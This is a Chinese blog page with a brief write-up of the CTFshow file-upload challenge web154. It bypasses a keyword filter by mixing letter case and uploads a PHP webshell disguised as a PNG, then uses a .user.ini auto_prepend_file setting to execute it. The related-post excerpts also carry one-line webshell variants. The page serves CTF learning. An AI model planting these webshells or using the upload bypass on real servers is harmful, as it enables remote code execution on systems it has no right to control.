CTFshow 文件上传 web154

最新推荐文章于 2024-05-25 15:23:03 发布
最新推荐文章于 2024-05-25 15:23:03 发布
阅读量412 收藏
点赞数
分类专栏: CTFshow 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kracxi/article/details/122950466
版权

目录

思路

上传一个包含shell的png文件,发现上传失败

在这里插入图片描述

清空文件内容,发现上传成功,可能过滤文件中的关键字,经过尝试,猜测文件对php进行过滤,可以用大小写来绕过

在这里插入图片描述
shell.png

<?phP
 echo 123;pHpinfo();eval($_POST['cmd']); 
?>

发现其他和上题一样,直接上传.user.ini
.user.ini

auto_prepend_file=shell.png

然后访问/upload/index.php,直接RCE

总结

Kradress
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow-web154(文件)
m0_62094846的博客
01-18 765
png上也会错误,说文件内容不合规 上个不带木马的文件就可以 说明一句话木马中有敏感信息 使用其他短标签可以绕过 <?= eval($_POST[1]);?> <? eval($_POST[1]);?> <% eval($_POST[1]);%> 入png的木马文件可以,但是php文件加了png文件头也没用 说明可能php确实就是不能使用 考虑使用配置文件 .user.ini 确认是否可以使用 确实可以,接下来就比较好办了 ...
ctfshow web入门文件
Npceer-一位网安初学者的博客
05-25 377
之前已经写了一部分了 补一下博客 给自己之后当笔记看看 这里写目录标题0x01 web153(前面两题懒得写博客了)0x02 web 154 0x01 web153(前面两题懒得写博客了) 首先题目环境大多是nginx 前面两题是前端验证 直接抓包改后缀就行 这次不行了 所以说到nginx我们考虑到.uer.ini (.htaccess是apache下的) 但是被挡下来了 于是上.user.ini.png 内容是 然后抓包把后缀.png去掉 就可以 这个第一行是gif的文件头 之前写其他平台文件的时
ctfshow WEB入门 文件151-170_ctfshow web入门文件包含167(1)
2401_83974570的博客
04-11 278
只是过滤了分号,其他同上。php的最后一个分号可以省略。
ctfshow web入门 文件(持续更新)
Lum1n0us's Blog
03-26 466
文章目录web151-152web153web154-159web160web161 web151-152 hint是前台验证,那么直接先上.png后缀的图片马,在burp中将.png改为.php即可,然后蚁剑连接拿到flag web153 这题我试了把后缀改为.Php .php2 .phtml 估计是服务器不解析的原因,在访问时只能把他们下载下来,因为这里是nginx,所以试了上.user.ini,发现可行 我们指定一个文件(如a.jpg),那么该文件就会被包含在要执行的php文件中(如index.
ctfshow [web] 文件 151--155
weixin_68906365的博客
02-18 444
ctfshow文件151--155
CTFshow刷题日记-WEB-文件
Love&Share
09-08 1453
web151-前端绕过 简单只要在前端把exts:png改成php exts:'php' 访问 /upload/shell.php?shell=system("tac ../flag.php"); web152-content-type绕过 这次不改前端了,直接在bp改,将Content-Type改成 image/png 总结下常见conten-type类型 常见的媒体格式类型如下: text/html : HTML格式 text/plain :纯文本格式 text/xml : XML格式 im
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
cftshow web学习记录(二)
weixin_52555162的博客
02-24 983
萌新计划,这次更新web16-21 web16: 审计代码发现我们只要满足: if(md5("ctfshow$c")==="a6f57ae38a22448c2f07f3f95f49c84e"){ echo $flag; 满足这一句的条件就可以: 先来看看mad5函数的作用: 这个函数使用来计算字符的MD5散列,他可以选择十六进制或者二进制输出格式 分析if(md5("ctfshow$c")==="a6f57ae38a22448c2f07f3f95f49c8..
CTFshow-文件
qq_61376069的博客
01-22 496
CTFshow入门——文件
Web】CISCN 2024初赛 题解(全)
uuzeray的博客
05-21 1179
这里注意细节,靶机发了两次请求,第一次我们就返回一个正常的图片,第二次请求就发一个302,php代码块要用html标签包裹。注意下面这段报错,因为加不了引号,开头是数字的话,就会将类型识别为数字,若后续出现了字符串就会报错。再打sqlite,指定tableName,加载写入的恶意so文件,反弹shell。最后注意要将获取的变量元组转字符串,再用逗号分隔,依次输出,从而绕过seed。考的python栈帧沙箱逃逸,获取到外部的栈帧,就可以用。因为ban了引号,考虑hex2bin,将数字转为字符串。
【全开源】沃德商协会管理系统源码(FastAdmin+ThinkPHP+Uniapp)
最新发布
u011092458的博客
05-25 469
一款基于FastAdmin+ThinkPHP+Uniapp开发的商协会系统,新一代数字化商协会运营管理系统,以“智慧化会员体系、智敏化内容运营、智能化活动构建”三大板块为基点,实施功能全场景覆盖,一站式解决商协会需求壁垒,有效快速建立自有数字化管理体系、提升组织管理效能、增强会员粘性、沟通连接市场,真正做到为构建有影响力的现代化智慧型组织赋能。数据决策支持:沃德商协会管理系统源码提供的数据统计和分析功能,为商协会提供了宝贵的决策支持,帮助商协会更好地了解市场需求和会员需求,制定更精准的发展战略。
深入解析:Element Plus 与 Vite、Nuxt、Laravel 的结合使用
一个普通人
05-23 974
Element Plus 作为一个强大的 Vue.js 组件库,可以与 Vite、Nuxt 和 Laravel 等不同的工具和框架结合使用,为开发者提供灵活、高效的开发体验。根据项目需求选择合适的工具和框架,可以极大地提升开发效率和应用性能
PHP生成二维码+二维码包含logo图片展示
颜夕_
05-20 287
前端你自己列表读uploads/admin/qrcode/‘.$aid.’.png这个就行。生成二维码包含logo图片(代码仅供参考,逻辑按照自己的写)用到的扩展自己安装(注:只生成二维码只要开gd扩展就行)
用PHP封装一个强大且通用的CURL方法
A-南的博客
05-23 219
用PHP封装一个通用的CURL方法 支持:get、post、put、delete、patch、options。
Vitis HLS 学习笔记--控制驱动TLP-处理deadlock
hi94的博客
05-22 979
在数据流优化中,通道类型、握手机制、FIFO大小和死锁避免都是关键因素。通过Dataflow查看器和协同仿真数据,您可以有效地优化设计,提高性能并避免潜在问题。
ctfshow web入门文件
09-29
文件是CTF比赛中的一个常见挑战之一。其中一种方法是通过上包含恶意代码的文件来绕过服务器的文件类型限制。比如,在上图片时,可以同时上一个名为.user.ini的文件,并在其中设置auto_append_file参数来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值